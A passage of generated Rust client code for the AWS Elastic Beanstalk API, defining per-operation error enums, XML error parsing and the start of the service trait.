Unknown(String) } impl DescribeEventsError { pub fn from_body(body: &str) -> DescribeEventsError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { _ => DescribeEventsError::Unknown(String::from(body)) } }, Err(_) => DescribeEventsError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeEventsError { fn from(err: XmlParseError) -> DescribeEventsError { let XmlParseError(message) = err; DescribeEventsError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeEventsError { fn from(err: CredentialsError) -> DescribeEventsError { DescribeEventsError::Credentials(err) } } impl From<HttpDispatchError> for DescribeEventsError { fn from(err: HttpDispatchError) -> DescribeEventsError { DescribeEventsError::HttpDispatch(err) } } impl fmt::Display for DescribeEventsError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeEventsError { fn description(&self) -> &str { match *self { DescribeEventsError::Validation(ref cause) => cause, DescribeEventsError::Credentials(ref err) => err.description(), DescribeEventsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeEventsError::Unknown(ref cause) => cause } } } /// Errors returned by DescribeInstancesHealth #[derive(Debug, PartialEq)] pub enum DescribeInstancesHealthError { ///<p>A generic service exception has occurred.</p> ElasticBeanstalkService(String), ///<p>One or more input parameters is not valid. Please correct the input parameters and try the operation again.</p> InvalidRequest(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DescribeInstancesHealthError { pub fn from_body(body: &str) -> DescribeInstancesHealthError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "ElasticBeanstalkServiceException" => DescribeInstancesHealthError::ElasticBeanstalkService(String::from(parsed_error.message)),"InvalidRequestException" => DescribeInstancesHealthError::InvalidRequest(String::from(parsed_error.message)),_ => DescribeInstancesHealthError::Unknown(String::from(body)) } }, Err(_) => DescribeInstancesHealthError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeInstancesHealthError { fn from(err: XmlParseError) -> DescribeInstancesHealthError { let XmlParseError(message) = err; DescribeInstancesHealthError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeInstancesHealthError { fn from(err: CredentialsError) -> DescribeInstancesHealthError { DescribeInstancesHealthError::Credentials(err) } } impl From<HttpDispatchError> for DescribeInstancesHealthError { fn from(err: HttpDispatchError) -> DescribeInstancesHealthError { DescribeInstancesHealthError::HttpDispatch(err) } } impl fmt::Display for DescribeInstancesHealthError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeInstancesHealthError { fn description(&self) -> &str { match *self { DescribeInstancesHealthError::ElasticBeanstalkService(ref cause) => cause, DescribeInstancesHealthError::InvalidRequest(ref cause) => cause, DescribeInstancesHealthError::Validation(ref cause) => cause, DescribeInstancesHealthError::Credentials(ref err) => err.description(), DescribeInstancesHealthError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeInstancesHealthError::Unknown(ref cause) => cause } } } /// Errors returned by ListAvailableSolutionStacks #[derive(Debug, PartialEq)] pub enum ListAvailableSolutionStacksError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl ListAvailableSolutionStacksError { pub fn from_body(body: &str) -> ListAvailableSolutionStacksError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { _ => ListAvailableSolutionStacksError::Unknown(String::from(body)) } }, Err(_) => ListAvailableSolutionStacksError::Unknown(body.to_string()) } } } impl From<XmlParseError> for ListAvailableSolutionStacksError { fn from(err: XmlParseError) -> ListAvailableSolutionStacksError { let XmlParseError(message) = err; ListAvailableSolutionStacksError::Unknown(message.to_string()) } } impl From<CredentialsError> for ListAvailableSolutionStacksError { fn from(err: CredentialsError) -> ListAvailableSolutionStacksError { ListAvailableSolutionStacksError::Credentials(err) } } impl From<HttpDispatchError> for ListAvailableSolutionStacksError { fn from(err: HttpDispatchError) -> ListAvailableSolutionStacksError { ListAvailableSolutionStacksError::HttpDispatch(err) } } impl fmt::Display for ListAvailableSolutionStacksError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for ListAvailableSolutionStacksError { fn description(&self) -> &str { match *self { ListAvailableSolutionStacksError::Validation(ref cause) => cause, ListAvailableSolutionStacksError::Credentials(ref err) => err.description(), ListAvailableSolutionStacksError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), ListAvailableSolutionStacksError::Unknown(ref cause) => cause } } } /// Errors returned by RebuildEnvironment #[derive(Debug, PartialEq)] pub enum RebuildEnvironmentError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl RebuildEnvironmentError { pub fn from_body(body: &str) -> RebuildEnvironmentError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "InsufficientPrivilegesException" => RebuildEnvironmentError::InsufficientPrivileges(String::from(parsed_error.message)),_ => RebuildEnvironmentError::Unknown(String::from(body)) } }, Err(_) => RebuildEnvironmentError::Unknown(body.to_string()) } } } impl From<XmlParseError> for RebuildEnvironmentError { fn from(err: XmlParseError) -> RebuildEnvironmentError { let XmlParseError(message) = err; RebuildEnvironmentError::Unknown(message.to_string()) } } impl From<CredentialsError> for RebuildEnvironmentError { fn from(err: CredentialsError) -> RebuildEnvironmentError { RebuildEnvironmentError::Credentials(err) } } impl From<HttpDispatchError> for RebuildEnvironmentError { fn from(err: HttpDispatchError) -> RebuildEnvironmentError { RebuildEnvironmentError::HttpDispatch(err) } } impl fmt::Display for RebuildEnvironmentError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for RebuildEnvironmentError { fn description(&self) -> &str { match *self { RebuildEnvironmentError::InsufficientPrivileges(ref cause) => cause, RebuildEnvironmentError::Validation(ref cause) => cause, RebuildEnvironmentError::Credentials(ref err) => err.description(), RebuildEnvironmentError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), RebuildEnvironmentError::Unknown(ref cause) => cause } } } /// Errors returned by RequestEnvironmentInfo #[derive(Debug, PartialEq)] pub enum RequestEnvironmentInfoError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl RequestEnvironmentInfoError { pub fn from_body(body: &str) -> RequestEnvironmentInfoError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { _ => RequestEnvironmentInfoError::Unknown(String::from(body)) } }, Err(_) => RequestEnvironmentInfoError::Unknown(body.to_string()) } } } impl From<XmlParseError> for RequestEnvironmentInfoError { fn from(err: XmlParseError) -> RequestEnvironmentInfoError { let XmlParseError(message) = err; RequestEnvironmentInfoError::Unknown(message.to_string()) } } impl From<CredentialsError> for RequestEnvironmentInfoError { fn from(err: CredentialsError) -> RequestEnvironmentInfoError { RequestEnvironmentInfoError::Credentials(err) } } impl From<HttpDispatchError> for RequestEnvironmentInfoError { fn from(err: HttpDispatchError) -> RequestEnvironmentInfoError { RequestEnvironmentInfoError::HttpDispatch(err) } } impl fmt::Display for RequestEnvironmentInfoError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for RequestEnvironmentInfoError { fn description(&self) -> &str { match *self { RequestEnvironmentInfoError::Validation(ref cause) => cause, RequestEnvironmentInfoError::Credentials(ref err) => err.description(), RequestEnvironmentInfoError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), RequestEnvironmentInfoError::Unknown(ref cause) => cause } } } /// Errors returned by RestartAppServer #[derive(Debug, PartialEq)] pub enum RestartAppServerError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl RestartAppServerError { pub fn from_body(body: &str) -> RestartAppServerError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { _ => RestartAppServerError::Unknown(String::from(body)) } }, Err(_) => RestartAppServerError::Unknown(body.to_string()) } } } impl From<XmlParseError> for RestartAppServerError { fn from(err: XmlParseError) -> RestartAppServerError { let XmlParseError(message) = err; RestartAppServerError::Unknown(message.to_string()) } } impl From<CredentialsError> for RestartAppServerError { fn from(err: CredentialsError) -> RestartAppServerError { RestartAppServerError::Credentials(err) } } impl From<HttpDispatchError> for RestartAppServerError { fn from(err: HttpDispatchError) -> RestartAppServerError { RestartAppServerError::HttpDispatch(err) } } impl fmt::Display for RestartAppServerError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for RestartAppServerError { fn description(&self) -> &str { match *self { RestartAppServerError::Validation(ref cause) => cause, RestartAppServerError::Credentials(ref err) => err.description(), RestartAppServerError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), RestartAppServerError::Unknown(ref cause) => cause } } } /// Errors returned by RetrieveEnvironmentInfo #[derive(Debug, PartialEq)] pub enum RetrieveEnvironmentInfoError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl RetrieveEnvironmentInfoError { pub fn from_body(body: &str) -> RetrieveEnvironmentInfoError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { _ => RetrieveEnvironmentInfoError::Unknown(String::from(body)) } }, Err(_) => RetrieveEnvironmentInfoError::Unknown(body.to_string()) } } } impl From<XmlParseError> for RetrieveEnvironmentInfoError { fn from(err: XmlParseError) -> RetrieveEnvironmentInfoError { let XmlParseError(message) = err; RetrieveEnvironmentInfoError::Unknown(message.to_string()) } } impl From<CredentialsError> for RetrieveEnvironmentInfoError { fn from(err: CredentialsError) -> RetrieveEnvironmentInfoError { RetrieveEnvironmentInfoError::Credentials(err) } } impl From<HttpDispatchError> for RetrieveEnvironmentInfoError { fn from(err: HttpDispatchError) -> RetrieveEnvironmentInfoError { RetrieveEnvironmentInfoError::HttpDispatch(err) } } impl fmt::Display for RetrieveEnvironmentInfoError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for RetrieveEnvironmentInfoError { fn description(&self) -> &str { match *self { RetrieveEnvironmentInfoError::Validation(ref cause) => cause, RetrieveEnvironmentInfoError::Credentials(ref err) => err.description(), RetrieveEnvironmentInfoError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), RetrieveEnvironmentInfoError::Unknown(ref cause) => cause } } } /// Errors returned by SwapEnvironmentCNAMEs #[derive(Debug, PartialEq)] pub enum SwapEnvironmentCNAMEsError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl SwapEnvironmentCNAMEsError { pub fn from_body(body: &str) -> SwapEnvironmentCNAMEsError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { _ => SwapEnvironmentCNAMEsError::Unknown(String::from(body)) } }, Err(_) => SwapEnvironmentCNAMEsError::Unknown(body.to_string()) } } } impl From<XmlParseError> for SwapEnvironmentCNAMEsError { fn from(err: XmlParseError) -> SwapEnvironmentCNAMEsError { let XmlParseError(message) = err; SwapEnvironmentCNAMEsError::Unknown(message.to_string()) } } impl From<CredentialsError> for SwapEnvironmentCNAMEsError { fn from(err: CredentialsError) -> SwapEnvironmentCNAMEsError { SwapEnvironmentCNAMEsError::Credentials(err) } } impl From<HttpDispatchError> for SwapEnvironmentCNAMEsError { fn from(err: HttpDispatchError) -> SwapEnvironmentCNAMEsError { SwapEnvironmentCNAMEsError::HttpDispatch(err) } } impl fmt::Display for SwapEnvironmentCNAMEsError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for SwapEnvironmentCNAMEsError { fn description(&self) -> &str { match *self { SwapEnvironmentCNAMEsError::Validation(ref cause) => cause, SwapEnvironmentCNAMEsError::Credentials(ref err) => err.description(), SwapEnvironmentCNAMEsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), SwapEnvironmentCNAMEsError::Unknown(ref cause) => cause } } } /// Errors returned by TerminateEnvironment #[derive(Debug, PartialEq)] pub enum TerminateEnvironmentError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl TerminateEnvironmentError { pub fn from_body(body: &str) -> TerminateEnvironmentError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "InsufficientPrivilegesException" => TerminateEnvironmentError::InsufficientPrivileges(String::from(parsed_error.message)),_ => TerminateEnvironmentError::Unknown(String::from(body)) } }, Err(_) => TerminateEnvironmentError::Unknown(body.to_string()) } } } impl From<XmlParseError> for TerminateEnvironmentError { fn from(err: XmlParseError) -> TerminateEnvironmentError { let XmlParseError(message) = err; TerminateEnvironmentError::Unknown(message.to_string()) } } impl From<CredentialsError> for TerminateEnvironmentError { fn from(err: CredentialsError) -> TerminateEnvironmentError { TerminateEnvironmentError::Credentials(err) } } impl From<HttpDispatchError> for TerminateEnvironmentError { fn from(err: HttpDispatchError) -> TerminateEnvironmentError { TerminateEnvironmentError::HttpDispatch(err) } } impl fmt::Display for TerminateEnvironmentError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for TerminateEnvironmentError { fn description(&self) -> &str { match *self { TerminateEnvironmentError::InsufficientPrivileges(ref cause) => cause, TerminateEnvironmentError::Validation(ref cause) => cause, TerminateEnvironmentError::Credentials(ref err) => err.description(), TerminateEnvironmentError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), TerminateEnvironmentError::Unknown(ref cause) => cause } } } /// Errors returned by UpdateApplication #[derive(Debug, PartialEq)] pub enum UpdateApplicationError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl UpdateApplicationError { pub fn from_body(body: &str) -> UpdateApplicationError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { _ => UpdateApplicationError::Unknown(String::from(body)) } }, Err(_) => UpdateApplicationError::Unknown(body.to_string()) } } } impl From<XmlParseError> for UpdateApplicationError { fn from(err: XmlParseError) -> UpdateApplicationError { let XmlParseError(message) = err; UpdateApplicationError::Unknown(message.to_string()) } } impl From<CredentialsError> for UpdateApplicationError { fn from(err: CredentialsError) -> UpdateApplicationError { UpdateApplicationError::Credentials(err) } } impl From<HttpDispatchError> for UpdateApplicationError { fn from(err: HttpDispatchError) -> UpdateApplicationError { UpdateApplicationError::HttpDispatch(err) } } impl fmt::Display for UpdateApplicationError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for UpdateApplicationError { fn description(&self) -> &str { match *self { UpdateApplicationError::Validation(ref cause) => cause, UpdateApplicationError::Credentials(ref err) => err.description(), UpdateApplicationError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), UpdateApplicationError::Unknown(ref cause) => cause } } } /// Errors returned by UpdateApplicationResourceLifecycle #[derive(Debug, PartialEq)] pub enum UpdateApplicationResourceLifecycleError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl UpdateApplicationResourceLifecycleError { pub fn from_body(body: &str) -> UpdateApplicationResourceLifecycleError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "InsufficientPrivilegesException" => UpdateApplicationResourceLifecycleError::InsufficientPrivileges(String::from(parsed_error.message)),_ => UpdateApplicationResourceLifecycleError::Unknown(String::from(body)) } }, Err(_) => UpdateApplicationResourceLifecycleError::Unknown(body.to_string()) } } } impl From<XmlParseError> for UpdateApplicationResourceLifecycleError { fn from(err: XmlParseError) -> UpdateApplicationResourceLifecycleError { let XmlParseError(message) = err; UpdateApplicationResourceLifecycleError::Unknown(message.to_string()) } } impl From<CredentialsError> for UpdateApplicationResourceLifecycleError { fn from(err: CredentialsError) -> UpdateApplicationResourceLifecycleError { UpdateApplicationResourceLifecycleError::Credentials(err) } } impl From<HttpDispatchError> for UpdateApplicationResourceLifecycleError { fn from(err: HttpDispatchError) -> UpdateApplicationResourceLifecycleError { UpdateApplicationResourceLifecycleError::HttpDispatch(err) } } impl fmt::Display for UpdateApplicationResourceLifecycleError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for UpdateApplicationResourceLifecycleError { fn description(&self) -> &str { match *self { UpdateApplicationResourceLifecycleError::InsufficientPrivileges(ref cause) => cause, UpdateApplicationResourceLifecycleError::Validation(ref cause) => cause, UpdateApplicationResourceLifecycleError::Credentials(ref err) => err.description(), UpdateApplicationResourceLifecycleError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), UpdateApplicationResourceLifecycleError::Unknown(ref cause) => cause } } } /// Errors returned by UpdateApplicationVersion #[derive(Debug, PartialEq)] pub enum UpdateApplicationVersionError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl UpdateApplicationVersionError { pub fn from_body(body: &str) -> UpdateApplicationVersionError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { _ => UpdateApplicationVersionError::Unknown(String::from(body)) } }, Err(_) => UpdateApplicationVersionError::Unknown(body.to_string()) } } } impl From<XmlParseError> for UpdateApplicationVersionError { fn from(err: XmlParseError) -> UpdateApplicationVersionError { let XmlParseError(message) = err; UpdateApplicationVersionError::Unknown(message.to_string()) } } impl From<CredentialsError> for UpdateApplicationVersionError { fn from(err: CredentialsError) -> UpdateApplicationVersionError { UpdateApplicationVersionError::Credentials(err) } } impl From<HttpDispatchError> for UpdateApplicationVersionError { fn from(err: HttpDispatchError) -> UpdateApplicationVersionError { UpdateApplicationVersionError::HttpDispatch(err) } } impl fmt::Display for UpdateApplicationVersionError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for UpdateApplicationVersionError { fn description(&self) -> &str { match *self { UpdateApplicationVersionError::Validation(ref cause) => cause, UpdateApplicationVersionError::Credentials(ref err) => err.description(), UpdateApplicationVersionError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), UpdateApplicationVersionError::Unknown(ref cause) => cause } } } /// Errors returned by UpdateConfigurationTemplate #[derive(Debug, PartialEq)] pub enum UpdateConfigurationTemplateError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String), ///<p>The specified account has reached its limit of Amazon S3 buckets.</p> TooManyBuckets(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl UpdateConfigurationTemplateError { pub fn from_body(body: &str) -> UpdateConfigurationTemplateError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "InsufficientPrivilegesException" => UpdateConfigurationTemplateError::InsufficientPrivileges(String::from(parsed_error.message)),"TooManyBucketsException" => UpdateConfigurationTemplateError::TooManyBuckets(String::from(parsed_error.message)),_ => UpdateConfigurationTemplateError::Unknown(String::from(body)) } }, Err(_) => UpdateConfigurationTemplateError::Unknown(body.to_string()) } } } impl From<XmlParseError> for UpdateConfigurationTemplateError { fn from(err: XmlParseError) -> UpdateConfigurationTemplateError { let XmlParseError(message) = err; UpdateConfigurationTemplateError::Unknown(message.to_string()) } } impl From<CredentialsError> for UpdateConfigurationTemplateError { fn from(err: CredentialsError) -> UpdateConfigurationTemplateError { UpdateConfigurationTemplateError::Credentials(err) } } impl From<HttpDispatchError> for UpdateConfigurationTemplateError { fn from(err: HttpDispatchError) -> UpdateConfigurationTemplateError { UpdateConfigurationTemplateError::HttpDispatch(err) } } impl fmt::Display for UpdateConfigurationTemplateError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for UpdateConfigurationTemplateError { fn description(&self) -> &str { match *self { UpdateConfigurationTemplateError::InsufficientPrivileges(ref cause) => cause, UpdateConfigurationTemplateError::TooManyBuckets(ref cause) => cause, UpdateConfigurationTemplateError::Validation(ref cause) => cause, UpdateConfigurationTemplateError::Credentials(ref err) => err.description(), UpdateConfigurationTemplateError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), UpdateConfigurationTemplateError::Unknown(ref cause) => cause } } } /// Errors returned by UpdateEnvironment #[derive(Debug, PartialEq)] pub enum UpdateEnvironmentError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String), ///<p>The specified account has reached its limit of Amazon S3 buckets.</p> TooManyBuckets(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl UpdateEnvironmentError { pub fn from_body(body: &str) -> UpdateEnvironmentError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "InsufficientPrivilegesException" => UpdateEnvironmentError::InsufficientPrivileges(String::from(parsed_error.message)),"TooManyBucketsException" => UpdateEnvironmentError::TooManyBuckets(String::from(parsed_error.message)),_ => UpdateEnvironmentError::Unknown(String::from(body)) } }, Err(_) => UpdateEnvironmentError::Unknown(body.to_string()) } } } impl From<XmlParseError> for UpdateEnvironmentError { fn from(err: XmlParseError) -> UpdateEnvironmentError { let XmlParseError(message) = err; UpdateEnvironmentError::Unknown(message.to_string()) } } impl From<CredentialsError> for UpdateEnvironmentError { fn from(err: CredentialsError) -> UpdateEnvironmentError { UpdateEnvironmentError::Credentials(err) } } impl From<HttpDispatchError> for UpdateEnvironmentError { fn from(err: HttpDispatchError) -> UpdateEnvironmentError { UpdateEnvironmentError::HttpDispatch(err) } } impl fmt::Display for UpdateEnvironmentError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for UpdateEnvironmentError { fn description(&self) -> &str { match *self { UpdateEnvironmentError::InsufficientPrivileges(ref cause) => cause, UpdateEnvironmentError::TooManyBuckets(ref cause) => cause, UpdateEnvironmentError::Validation(ref cause) => cause, UpdateEnvironmentError::Credentials(ref err) => err.description(), UpdateEnvironmentError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), UpdateEnvironmentError::Unknown(ref cause) => cause } } } /// Errors returned by ValidateConfigurationSettings #[derive(Debug, PartialEq)] pub enum ValidateConfigurationSettingsError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String), ///<p>The specified account has reached its limit of Amazon S3 buckets.</p> TooManyBuckets(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl ValidateConfigurationSettingsError { pub fn from_body(body: &str) -> ValidateConfigurationSettingsError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "InsufficientPrivilegesException" => ValidateConfigurationSettingsError::InsufficientPrivileges(String::from(parsed_error.message)),"TooManyBucketsException" => ValidateConfigurationSettingsError::TooManyBuckets(String::from(parsed_error.message)),_ => ValidateConfigurationSettingsError::Unknown(String::from(body)) } }, Err(_) => ValidateConfigurationSettingsError::Unknown(body.to_string()) } } } impl From<XmlParseError> for ValidateConfigurationSettingsError { fn from(err: XmlParseError) -> ValidateConfigurationSettingsError { let XmlParseError(message) = err; ValidateConfigurationSettingsError::Unknown(message.to_string()) } } impl From<CredentialsError> for ValidateConfigurationSettingsError { fn from(err: CredentialsError) -> ValidateConfigurationSettingsError { ValidateConfigurationSettingsError::Credentials(err) } } impl From<HttpDispatchError> for ValidateConfigurationSettingsError { fn from(err: HttpDispatchError) -> ValidateConfigurationSettingsError { ValidateConfigurationSettingsError::HttpDispatch(err) } } impl fmt::Display for ValidateConfigurationSettingsError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for ValidateConfigurationSettingsError { fn description(&self) -> &str { match *self { ValidateConfigurationSettingsError::InsufficientPrivileges(ref cause) => cause, ValidateConfigurationSettingsError::TooManyBuckets(ref cause) => cause, ValidateConfigurationSettingsError::Validation(ref cause) => cause, ValidateConfigurationSettingsError::Credentials(ref err) => err.description(), ValidateConfigurationSettingsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), ValidateConfigurationSettingsError::Unknown(ref cause) => cause } } } /// Trait representing the capabilities of the Elastic Beanstalk API. Elastic Beanstalk clients implement this trait. pub trait ElasticBeanstalk { #[doc="<p>Cancels in-progress environment configuration update or application version deployment.</p>"] fn abort_environment_update(&self, input: &AbortEnvironmentUpdateMessage) -> Result<(), AbortEnvironmentUpdateError>; #[doc="<p>Applies a scheduled managed action immediately. A managed action can be applied only if its status is <code>Scheduled</code>. Get the status and action ID of a managed action with <a>DescribeEnvironmentManagedActions</a>.</p>"] fn apply_environment_managed_action(&self, input: &ApplyEnvironmentManagedActionRequest) -> Result<ApplyEnvironmentManagedActionResult, ApplyEnvironmentManagedActionError>; #[doc="<p>Checks if the specified CNAME is available.</p>"] fn check_dns_availability(&self, input: &CheckDNSAvailabilityMessage) -> Result<CheckDNSAvailabilityResultMessage, 